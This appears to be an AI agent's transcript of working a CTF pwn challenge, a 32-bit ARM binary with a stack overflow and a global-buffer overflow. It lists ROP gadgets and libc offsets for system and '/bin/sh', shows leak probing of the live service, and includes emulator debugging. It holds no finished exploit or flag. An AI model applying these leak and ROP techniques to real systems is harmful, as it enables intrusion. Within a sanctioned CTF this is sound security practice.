# Thread Handoff - Thread: quiet-packet-1740 - UUID: 6de6b710-808f-4f25-8296-cf5446c007a5 - CTF: midnight-sun-ctf-2026-quals - Challenge: speed-1 - Runtime: codex - Model: gpt-5.5 - Status: completed ## Transcript - **Assistant:** I’ll inspect the challenge files first, then connect to the service once I know what kind of interaction it expects. I’ll keep any webhook updates limited to progress notes, not secret material like the final flag. - **Assistant:** The challenge ships as a Linux binary with its own loader and libc, so I’m treating this as pwn/reversing rather than a web or crypto service. Next I’m checking architecture, mitigations, and the program’s behavior locally. - **Assistant:** [*] '/challenge/speed1' Arch: arm-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x10000) - **Assistant:** The target is a 32-bit ARM hard-float ELF, non-PIE with NX and a stack canary. Local execution needs ARM emulation, so I’m switching to static disassembly and libc offset analysis first. - **Assistant:** The core bug is an unbounded list of decimal integers written into a 64-byte stack buffer. The sentinel `0` stops input but is not stored, and the later summing loop keeps reading words past the buffer until it sees a zero, which gives a numeric leak before the stack canary check. - **Assistant:** Gadgets information ============================================================ 0x00059468 : bx lr 0x0005dec8 : ldr r8, [sp], #0x20 ; bx lr 0x0005560c : pop {r0, ip, sp, pc} 0x000a4058 : pop {r0, r1, fp, ip, lr, pc} 0x0008c680 : pop {r0, r1, ip, lr, pc} 0x0001dd70 : pop {r0, r1, ip, sp, pc} 0x00097710 : pop {r0, r1, pc} 0x00025cd0 : pop {r0, r1, r2, ip, sp, pc} 0x00019ab4 : pop {r0, r1, r2, r3, ip, sp, pc} 0x0001d2d4 : pop {r0, r1, r2, r3, r4, ip, sp, pc} 0x000a2b8c : pop {r0, r1, r2, r3, r4, r5, ip, sp, pc} 0x000a2ab0 : pop {r0, r1, r2, r3, r5, ip, sp, pc} 0x000ae08c : pop {r0, r1, r2, r3, r5, r6, ip, sp, pc} 0x0001c094 : pop {r0, r1, r2, r4, ip, sp, pc} 0x0005f838 : pop {r0, r1, r2, r4, r6, ip, sp, pc} 0x0006fe3c : pop {r0, r1, r2, r4, r6, r8, sl, fp, ip, sp, lr, pc} 0x0004e54c : pop {r0, r1, r2, r5, ip, sp, pc} 0x000b6ce0 : pop {r0, r1, r2, r6, ip, sp, pc} 0x00028208 : pop {r0, r1, r3, ip, sp, pc} 0x00081338 : pop {r0, r1, r3, r4, ip, sp, pc} 0x000904f8 : pop {r0, r1, r3, r5, r6, r7, r8, sb, sl, pc} 0x00025b04 : pop {r0, r1, r3, r6, ip, sp, pc} 0x0001c7d4 : pop {r0, r1, r4, ip, sp, pc} 0x00067b24 : pop {r0, r1, r4, r5, ip, sp, pc} 0x00044844 : pop {r0, r1, r5, ip, sp, pc} 0x00095e68 : pop {r0, r1, r5, r6, r7, sl, fp, ip, sp, lr, pc} 0x000171d0 : pop {r0, r2, ip, sp, pc} 0x00037e08 : pop {r0, r2, r3, ip, sp, pc} 0x0008fba4 : pop {r0, r2, r3, r4, ip, sp, pc} 0x0006771c : pop {r0, r2, r3, r4, r5, fp, ip, sp, lr, pc} 0x000172c4 : pop {r0, r2, r3, r4, r6, r8, sl, fp, ip, sp, lr, pc} 0x000b483c : pop {r0, r2, r3, r5, ip, sp, pc} 0x000c41ec : pop {r0, r2, r3, r5, r6, r8, sb, sl, fp, ip, sp, lr, pc} 0x00080e4c : pop {r0, r2, r3, r6, ip, sp, pc} 0x000671b0 : pop {r0, r2, r4, ip, sp, pc} 0x0008d578 : pop {r0, r2, r4, r5, ip, sp, pc} 0x00088d78 : pop {r0, r2, r4, r6, ip, sp, pc} 0x00095b94 : pop {r0, r2, r5, ip, sp, pc} 0x000b9814 : pop {r0, r2, r5, r6, r7, r8, sb, fp, ip, lr, pc} 0x0009ad04 : pop {r0, r2, r5, sl, fp, ip, sp, lr, pc} 0x00027e94 : pop {r0, r3, ip, sp, pc} 0x0001a8d8 : pop {r0, r3, r4, ip, sp, pc} 0x000233f8 : pop {r0, r3, r4, r5, r6, r7, r8, ip, lr, pc} 0x000be96c : pop {r0, r3, r5, r6, r7, r8, sb, sl, sp, lr, pc} 0x00019e2c : pop {r0, r4, ip, sp, pc} 0x0005919c : pop {r0, r4, pc} 0x000864c0 : pop {r0, r4, r5, ip, sp, pc} 0x00051ba0 : pop {r0, r4, r5, r6, r7, r8, ip, lr, pc} 0x000bed44 : pop {r0, r4, r6, ip, sp, pc} 0x0005b82c : pop {r0, r5, ip, sp, pc} 0x0006fe6c : pop {r0, r6, r7, r8, sb, fp, ip, sp, lr, pc} 0x0001dba0 : pop {r1, ip, sp, pc} 0x0004d9b8 : pop {r1, r2, ip, sp, pc} 0x000a5a7c : pop {r1, r2, r3, ip, sp, pc} 0x00073bc8 : pop {r1, r2, r3, r4, ip, sp, pc} 0x0004c6f4 : pop {r1, r2, r3, r5, ip, sp, pc} 0x000aefd8 : pop {r1, r2, r3, r5, r6, r7, r8, ip, lr, pc} 0x000ad360 : pop {r1, r2, r4, r6, ip, sp, pc} 0x0007b8f4 : pop {r1, r2, r5, r8, sl, fp, ip, lr, pc} 0x0008d284 : pop {r1, r3, ip, sp, pc} 0x00026d0c : pop {r1, r3, r4, r6, r7, r8, ip, lr, pc} 0x0008c358 : pop {r1, r4, ip, sp, pc} 0x00024e18 : pop {r1, r5, ip, sp, pc} 0x000586cc : pop {r1, r6, ip, sp, pc} 0x0002f16c : pop {r1, r6, r7, r8, sb, sl, sp, lr, pc} 0x0003208c : pop {r1, r8, sb, fp, pc} 0x000175f8 : pop {r2, ip, sp, pc} 0x00055e74 : pop {r2, r3, ip, sp, pc} 0x0004bf78 : pop {r2, r3, r4, ip, sp, pc} 0x0005f004 : pop {r2, r4, ip, sp, pc} 0x00093a50 : pop {r2, r5, r6, ip, sp, pc} 0x00049770 : pop {r2, sl, fp, pc} 0x000a34ec : pop {r2, sl, ip, pc} 0x0004b628 : pop {r3, ip, sp, pc} 0x0009a744 : pop {r3, r5, ip, sp, pc} 0x000af440 : pop {r3, r8, sl, fp, ip, sp, pc} 0x000552d0 : pop {r4, r5, r6, r7, r8, pc} 0x000b9364 : pop {r4, r5, r6, r7, r8, sb, fp, ip, lr, pc} 0x00050d24 : pop {r4, r5, r6, r7, sb, ip, sp, pc} 0x0001e8f0 : pop {r4, r5, r7, r8, fp, ip, sp, pc} 0x000b0b60 : pop {r4, r6, r7, r8, ip, lr, pc} 0x0009a3e4 : pop {r4, r8, sl, fp, ip, sp, pc} 0x0004e2c0 : pop {r5, ip, sp, pc} 0x000552cc : pop {r5, sb, sl, lr} ; pop {r4, r5, r6, r7, r8, pc} 0x000ade14 : pop {r6, r7, r8, ip, lr, pc} 0x0002f0e4 : pop {r6, r7, r8, sb, sl, sp, lr, pc} 0x0005d98c : pop {r8} ; bx lr Unique gadgets found: 87 - **Assistant:** I found the useful libc offsets: `system` is at `0x2d4cd` and `"/bin/sh"` at `0xd5f2c` in the provided ARM libc. I’m going to query the live service now to see whether connections fork from a stable parent, because that determines whether one leak can be reused for the exploit connection. - **Assistant:** SEQ 1 [0] ... OUT b' \x1b[1mres:\x1b[0m 0\n' SEQ 2 [1, 0] ... OUT b' \x1b[1mres:\x1b[0m 1\n' SEQ 17 [1, 1, 1] ... OUT b' \x1b[1mres:\x1b[0m 179313680\n' SEQ 18 [1, 1, 1] ... OUT b' \x1b[1mres:\x1b[0m 17\n*** stack smashing detected ***: terminated\n/home/ctf/run.sh: line 2: 1378972 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' - **Assistant:** The service is running the binary under `qemu-arm`. A 16-number input leaks a large sum while preserving the canary; a 17-number input overwrites the canary and aborts, confirming the overflow path. - **Assistant:** 0 b' \x1b[1mres:\x1b[0m 838747920\n' 1 b' \x1b[1mres:\x1b[0m -1988656624\n' 2 b' \x1b[1mres:\x1b[0m -1608805616\n' 3 b' \x1b[1mres:\x1b[0m 268091408\n' 4 b' \x1b[1mres:\x1b[0m 1580093968\n' 5 b' \x1b[1mres:\x1b[0m 928853520\n' 6 b' \x1b[1mres:\x1b[0m 1551538704\n' 7 b' \x1b[1mres:\x1b[0m -596516336\n' - **Assistant:** There is a second bug: each line is read with `fgets` length `0x1024` into a global buffer at `0x22044`, which reaches into nearby `.bss` data such as the copied `stdin` and `stdout` pointers. I’m checking whether that gives a cleaner same-process primitive than trying to reuse a randomized canary across connections. - **Assistant:** INFO: Recovering local variables (afva@@@F) INFO: Type matching analysis for all functions (aaft) INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 Usage: /c Search for crypto materials | /ca[?] [algo] search for keys expanded in memory (algo can be 'aes' or 'sm4') | /cc[?] [algo] [digest] find collisions (bruteforce block length values until given checksum is found) | /cd search for ASN1/DER certificates | /cg search for GPG/PGP keys and signatures (Plaintext and binary form) | /ck find well known constant tables from different hash and crypto algorithms | /cp[?] [algo] [pubkey] search for a private key matching a given public key | /cr search for ASN1/DER private keys (RSA and ECC) Usage: /c Search for crypto materials | /ca[?] [algo] search for keys expanded in memory (algo can be 'aes' or 'sm4') | /cc[?] [algo] [digest] find collisions (bruteforce block length values until given checksum is found) | /cd search for ASN1/DER certificates | /cg search for GPG/PGP keys and signatures (Plaintext and binary form) | /ck find well known constant tables from different hash and crypto algorithms | /cp[?] [algo] [pubkey] search for a private key matching a given public key | /cr search for ASN1/DER private keys (RSA and ECC) Usage: /c Search for crypto materials | /ca[?] [algo] search for keys expanded in memory (algo can be 'aes' or 'sm4') | /cc[?] [algo] [digest] find collisions (bruteforce block length values until given checksum is found) | /cd search for ASN1/DER certificates | /cg search for GPG/PGP keys and signatures (Plaintext and binary form) | /ck find well known constant tables from different hash and crypto algorithms | /cp[?] [algo] [pubkey] search for a private key matching a given public key | /cr search for ASN1/DER private keys (RSA and ECC) - **Assistant:** A crashing run can still print `res` before `__stack_chk_fail`. By overwriting the saved frame pointer with a nonzero word, the sum continues one word farther and leaks the saved return address. I’m using that to learn whether libc ASLR is stable enough across runs, even though the canary itself changes each run. - **Assistant:** 16 [510789904, -812360688] ['0x1e720910', '0xcf945c10'] 17 [17, 17] ['0x11', '0x11'] 18 [-948139671, 2119538737] ['0xc77c8969', '0x7e559831'] 19 [1787748507, 2061961603] ['0x6a8ee09b', '0x7ae70983'] 20 [-250386292, 391356564] ['0xf113688c', '0x1753a094'] 21 [2027780945, -211457519] ['0x78dd7b51', '0xf3656a11'] 22 [827691809, -355177735] ['0x31559321', '0xead46af9'] 23 [1763474530, 1196659850] ['0x691c7c62', '0x4753948a'] 24 [1202771691, -523501483] ['0x47b0d6eb', '0xe0cc0055'] - **Assistant:** Local ARM emulation is not installed in the workspace. I can still use the remote as an oracle, but qemu locally would make the FILE-pointer corruption path much faster to test, so I’m going to try installing the user-mode emulator. - **Assistant:** Get:6 http://archive.ubuntu.com/ubuntu resolute-backports InRelease [136 kB] - **Assistant:** Get:7 http://archive.ubuntu.com/ubuntu resolute/restricted amd64 Packages [189 kB] Get:8 http://archive.ubuntu.com/ubuntu resolute/multiverse amd64 Packages [352 kB] Get:9 http://archive.ubuntu.com/ubuntu resolute/main amd64 Packages [1874 kB] Get:10 http://archive.ubuntu.com/ubuntu resolute/universe amd64 Packages [20.1 MB] Get:11 http://archive.ubuntu.com/ubuntu resolute-updates/universe amd64 Packages [44.5 kB] Get:12 http://archive.ubuntu.com/ubuntu resolute-updates/main amd64 Packages [78.2 kB] Get:13 http://archive.ubuntu.com/ubuntu resolute-updates/restricted amd64 Packages [34.7 kB] Fetched 23.3 MB in 5s (4735 kB/s) Reading package lists... Reading package lists... Building dependency tree... Reading state information... Solving dependencies... The following additional packages will be installed: qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt The following NEW packages will be installed: qemu-user qemu-user-binfmt ubuntu-helper-virt-hwe ubuntu-virt 0 upgraded, 4 newly installed, 0 to remove and 1 not upgraded. Need to get 14.8 MB of archives. After this operation, 137 MB of additional disk space will be used. Get:1 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-helper-virt-hwe all 1:10.2.1+ds-1ubuntu4 [45.0 kB] Get:2 http://archive.ubuntu.com/ubuntu resolute/main amd64 ubuntu-virt amd64 1:10.2.1+ds-1ubuntu3 [40.4 kB] Get:3 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user amd64 1:10.2.1+ds-1ubuntu3 [14.7 MB] Get:4 http://archive.ubuntu.com/ubuntu resolute/universe amd64 qemu-user-binfmt amd64 1:10.2.1+ds-1ubuntu3 [1678 B] Fetched 14.8 MB in 2s (9245 kB/s) Selecting previously unselected package ubuntu-helper-virt-hwe. (Reading database ... (Reading database ... 5% (Reading database ... 10% (Reading database ... 15% (Reading database ... 20% (Reading database ... 25% (Reading database ... 30% (Reading database ... 35% (Reading database ... 40% (Reading database ... 45% (Reading database ... 50% (Reading database ... 55% (Reading database ... 60% (Reading database ... 65% (Reading database ... 70% (Reading database ... 75% (Reading database ... 80% (Reading database ... 85% (Reading database ... 90% (Reading database ... 95% (Reading database ... 100% (Reading database ... 73935 files and directories currently installed.) Preparing to unpack .../ubuntu-helper-virt-hwe_1%3a10.2.1+ds-1ubuntu4_all.deb ... Unpacking ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ... Selecting previously unselected package ubuntu-virt. Preparing to unpack .../ubuntu-virt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking ubuntu-virt (1:10.2.1+ds-1ubuntu3) ... Selecting previously unselected package qemu-user. Preparing to unpack .../qemu-user_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking qemu-user (1:10.2.1+ds-1ubuntu3) ... Selecting previously unselected package qemu-user-binfmt. Preparing to unpack .../qemu-user-binfmt_1%3a10.2.1+ds-1ubuntu3_amd64.deb ... Unpacking qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ... Setting up ubuntu-helper-virt-hwe (1:10.2.1+ds-1ubuntu4) ... Setting up ubuntu-virt (1:10.2.1+ds-1ubuntu3) ... Setting up qemu-user (1:10.2.1+ds-1ubuntu3) ... Setting up qemu-user-binfmt (1:10.2.1+ds-1ubuntu3) ... Processing triggers for systemd (259.5-0ubuntu3) ... - **Assistant:** Building dependency tree... Reading state information... Solving dependencies... The following NEW packages will be installed: gdb-multiarch 0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded. Need to get 7655 kB of archives. After this operation, 38.2 MB of additional disk space will be used. Get:1 http://archive.ubuntu.com/ubuntu resolute/universe amd64 gdb-multiarch amd64 17.1-2ubuntu1 [7655 kB] Fetched 7655 kB in 1s (8087 kB/s) Selecting previously unselected package gdb-multiarch. (Reading database ... (Reading database ... 5% (Reading database ... 10% (Reading database ... 15% (Reading database ... 20% (Reading database ... 25% (Reading database ... 30% (Reading database ... 35% (Reading database ... 40% (Reading database ... 45% (Reading database ... 50% (Reading database ... 55% (Reading database ... 60% (Reading database ... 65% (Reading database ... 70% (Reading database ... 75% (Reading database ... 80% (Reading database ... 85% (Reading database ... 90% (Reading database ... 95% (Reading database ... 100% (Reading database ... 74099 files and directories currently installed.) Preparing to unpack .../gdb-multiarch_17.1-2ubuntu1_amd64.deb ... Unpacking gdb-multiarch (17.1-2ubuntu1) ... Setting up gdb-multiarch (17.1-2ubuntu1) ... - **Assistant:** With local qemu installed, I can now reproduce crashes from the `.data` overflow. The path that avoids the stack canary is to make the first line start with `0`, overflow the copied `stdout` pointer, and let the final `printf` operate on controlled data. I’m debugging the crash point to turn that into a controlled call instead of a segfault. - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time 0x00033280 3867 str r0, [r7, 0x70] 0x00033282 3060 str r0, [r6] ┌─< 0x00033284 35d4 bmi 0x332f2 │ 0x00033286 794b ldr r3, [0x0003346c] ; [0x3346c:4]=0xc41c0 │ 0x00033288 7b44 add r3, pc │ 0x0003328a 1b68 ldr r3, [r3] │ 0x0003328c fb66 str r3, [r7, 0x6c] │ 0x0003328e 002b cmp r3, 0 ┌──< 0x00033290 00f08a86 beq.w 0x33fa8 ││ 0x00033294 764d ldr r5, [0x00033470] ; [0x33470:4]=200 ││ 0x00033296 5246 mov r2, sl ││ 0x00033298 764b ldr r3, [0x00033474] ; [0x33474:4]=0xc40d0 ││ 0x0003329a 07f19800 add.w r0, r7, 0x98 ││ 0x0003329e 7649 ldr r1, [0x00033478] ; [0x33478:4]=368 ││ 0x000332a0 59f80550 ldr.w r5, [sb, r5] ││ 0x000332a4 7b44 add r3, pc ││ 0x000332a6 d3f8b430 ldr.w r3, [r3, 0xb4] ││ 0x000332aa 2d68 ldr r5, [r5] ││ 0x000332ac 59f80110 ldr.w r1, [sb, r1] ││ 0x000332b0 6b40 eors r3, r5 ││ 0x000332b2 9847 blx r3 ││ 0x000332b4 daf80030 ldr.w r3, [sl] ││ 0x000332b8 1b04 lsls r3, r3, 0x10 ┌───< 0x000332ba 1ad4 bmi 0x332f2 │││ 0x000332bc daf84800 ldr.w r0, [sl, 0x48] │││ 0x000332c0 7b6f ldr r3, [r7, 0x74] │││ 0x000332c2 a3f59865 sub.w r5, r3, 0x4c0 │││ 0x000332c6 8368 ldr r3, [r0, 8] │││ 0x000332c8 ab42 cmp r3, r5 ┌────< 0x000332ca 0fd0 beq 0x332ec ││││ 0x000332cc 0123 movs r3, 1 ┌─────> 0x000332ce 50e8002f ldrex r2, [r0] ╎││││ 0x000332d2 002a cmp r2, 0 ┌──────< 0x000332d4 05d1 bne 0x332e2 │╎││││ 0x000332d6 40e80031 strex r1, r3, [r0] │╎││││ 0x000332da 0029 cmp r1, 0 │└─────< 0x000332dc f7d1 bne 0x332ce │ ││││ 0x000332de bff35b8f dmb ish └┌─────< 0x000332e2 40f0b980 bne.w 0x33458 │││││ 0x000332e6 daf84800 ldr.w r0, [sl, 0x48] - **Assistant:** 0x3b700807 base? 0x3b6e9000 out 997197849 0xf1809c1f base? 0xf17f2000 out -243229647 0x969ffc17 base? 0x969e8000 out -1767900119 0x92c41c1f base? 0x92c2a000 out -1832641487 0xdd94980f base? 0xdd932000 out -577464287 - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: res: 1569938585 *** stack smashing detected ***: terminated qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: Fatal error: glibc detected an invalid stdio handle qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time - offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 0x000f2800 49ed 0400 b101 0500 61e4 0400 b502 0500 I.......a....... 0x000f2810 ddde 0400 d1dd 0400 3d60 0400 39ed 0400 ........=`..9... 0x000f2820 5de9 0400 05e2 0400 b176 0400 51e9 0400 ]........v..Q... 0x000f2830 cd0d 0500 d50d 0500 0000 0000 0000 0000 ................ 0x000f2840 f1a0 0400 e593 0400 219e 0400 6d98 0400 ........!...m... 0x000f2850 d9a0 0400 f998 0400 019c 0400 89a1 0400 ................ 0x000f2860 b502 0500 1502 0500 4104 0500 c199 0400 ........A....... 0x000f2870 c10d 0500 c90d 0500 ad0d 0500 4104 0500 ............A... 0x000f2880 b90d 0500 cd0d 0500 d50d 0500 0000 0000 ................ 0x000f2890 0000 0000 f1a0 0400 5d9e 0400 219e 0400 ........]...!... 0x000f28a0 6d98 0400 d9a0 0400 f998 0400 019c 0400 m............... 0x000f28b0 89a1 0400 b502 0500 1502 0500 4104 0500 ............A... 0x000f28c0 c199 0400 c10d 0500 c90d 0500 ad0d 0500 ................ 0x000f28d0 4104 0500 b90d 0500 cd0d 0500 d50d 0500 A............... 0x000f28e0 0000 0000 0000 0000 cdef 0400 0db2 0400 ................ 0x000f28f0 b1af 0400 6d98 0400 4d97 0400 a1b4 0400 ....m...M....... 0x000f2900 81ea 0400 d9a8 0400 b502 0500 f9de 0400 ................ 0x000f2910 a9b3 0400 f96f 0400 39ed 0400 5de9 0400 .....o..9...]... 0x000f2920 05e2 0400 d5de 0400 51e9 0400 cd0d 0500 ........Q....... 0x000f2930 d50d 0500 0000 0000 0000 0000 cdef 0400 ................ 0x000f2940 0db2 0400 d1af 0400 6d98 0400 4d97 0400 ........m...M... 0x000f2950 a1b4 0400 81ea 0400 d9a8 0400 b502 0500 ................ 0x000f2960 f9de 0400 a9b3 0400 f96f 0400 39ed 0400 .........o..9... 0x000f2970 5de9 0400 05e2 0400 09e0 0400 51e9 0400 ]...........Q... 0x000f2980 cd0d 0500 d50d 0500 0000 0000 0000 0000 ................ 0x000f2990 cdef 0400 0db2 0400 41a4 0400 6d98 0400 ........A...m... 0x000f29a0 4d97 0400 a1b4 0400 81ea 0400 d9a8 0400 M............... 0x000f29b0 b502 0500 ddde 0400 a9b3 0400 f96f 0400 .............o.. 0x000f29c0 39ed 0400 5de9 0400 05e2 0400 d5de 0400 9...]........... 0x000f29d0 51e9 0400 cd0d 0500 d50d 0500 0000 0000 Q............... 0x000f29e0 0000 0000 b9ba 0400 5d9e 0400 219e 0400 ........]...!... 0x000f29f0 6d98 0400 d9a0 0400 f998 0400 019c 0400 m............... 0x000f2a00 89a1 0400 b502 0500 1502 0500 81ba 0400 ................ 0x000f2a10 c199 0400 c10d 0500 c90d 0500 ad0d 0500 ................ 0x000f2a20 4104 0500 b90d 0500 cd0d 0500 d50d 0500 A............... 0x000f2a30 0000 0000 0000 0000 7dc3 0400 d10e 0500 ........}....... 0x000f2a40 950e 0500 9d00 0500 1111 0500 d900 0500 ................ 0x000f2a50 b101 0500 d111 0500 b502 0500 1502 0500 ................ 0x000f2a60 4dc3 0400 f902 0500 c10d 0500 c90d 0500 M............... 0x000f2a70 ad0d 0500 4104 0500 b90d 0500 cd0d 0500 ....A........... 0x000f2a80 d50d 0500 0000 0000 0000 0000 2911 0500 ............)... 0x000f2a90 69c8 0400 950e 0500 9d00 0500 1111 0500 i............... 0x000f2aa0 d900 0500 b101 0500 d111 0500 b502 0500 ................ 0x000f2ab0 1502 0500 4104 0500 f902 0500 c10d 0500 ....A........... 0x000f2ac0 c90d 0500 ad0d 0500 4104 0500 b90d 0500 ........A....... 0x000f2ad0 cd0d 0500 d50d 0500 0000 0000 0000 0000 ................ 0x000f2ae0 0000 0000 8dc9 0400 0000 0000 0000 0000 ................ 0x000f2af0 0000 0000 35c9 0400 0000 0000 0000 0000 ....5........... 0x000f2b00 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x000f2b10 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x000f2b20 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x000f2b30 0000 0000 cdef 0400 fdf6 0400 e9f4 0400 ................ 0x000f2b40 9d00 0500 050d 0500 49ed 0400 81ea 0400 ........I....... 0x000f2b50 61e4 0400 b502 0500 ddde 0400 d1dd 0400 a............... 0x000f2b60 3d60 0400 39ed 0400 5de9 0400 05e2 0400 =`..9...]....... 0x000f2b70 d5de 0400 51e9 0400 cd0d 0500 d50d 0500 ....Q........... 0x000f2b80 0000 0000 0000 0000 cdef 0400 fdf6 0400 ................ 0x000f2b90 ddec 0400 9d00 0500 050d 0500 49ed 0400 ............I... 0x000f2ba0 c9e9 0400 e5eb 0400 b502 0500 f9de 0400 ................ 0x000f2bb0 0de2 0400 3d60 0400 39ed 0400 5de9 0400 ....=`..9...]... 0x000f2bc0 05e2 0400 09e0 0400 51e9 0400 cd0d 0500 ........Q....... 0x000f2bd0 d50d 0500 0000 0000 0000 0000 cdef 0400 ................ 0x000f2be0 fdf6 0400 e5e3 0400 9d00 0500 050d 0500 ................ 0x000f2bf0 